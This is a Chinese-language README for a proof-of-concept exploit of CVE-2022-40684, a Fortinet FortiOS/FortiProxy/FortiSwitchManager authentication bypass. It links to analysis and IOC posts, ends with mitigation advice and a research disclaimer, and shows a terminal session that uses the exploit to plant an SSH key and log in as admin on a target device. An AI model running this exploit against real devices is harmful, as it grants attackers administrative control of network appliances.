针对 Fortinet FortiOS、FortiProxy 和 FortiSwitchManager 设备的 CVE-2022-40684 概念验证(POC)。
有关该漏洞的技术根因分析,请参见我们的博客: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
若要分析 Fortinet 日志以寻找失陷指标(IOC),并了解如何启用更详细的日志,请查看我们的 IOC 博客: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
此 POC 利用身份验证绕过漏洞为指定用户设置 SSH 密钥。
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
请升级到最新版本,或按照 Fortinet PSIRT 内的说明进行缓解:
本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除非获得明确授权,否则不得用于攻击系统。项目维护者不对软件的滥用负责或承担任何责任。请负责任地使用。